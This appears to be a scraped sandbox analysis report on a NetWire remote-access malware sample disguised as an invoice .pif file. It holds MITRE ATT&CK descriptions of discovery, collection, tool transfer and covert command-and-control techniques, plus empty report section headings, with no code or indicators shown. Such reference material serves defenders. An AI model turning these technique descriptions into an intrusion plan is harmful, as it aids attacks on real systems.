Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	API monitoring, File monitoring, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report important invoice presentation nov 2021.pif

Overview

General Information

Detection

Compliance

Signatures

Classification

Process Tree

Malware Configuration

Threatname: NetWire

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Cryptography:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre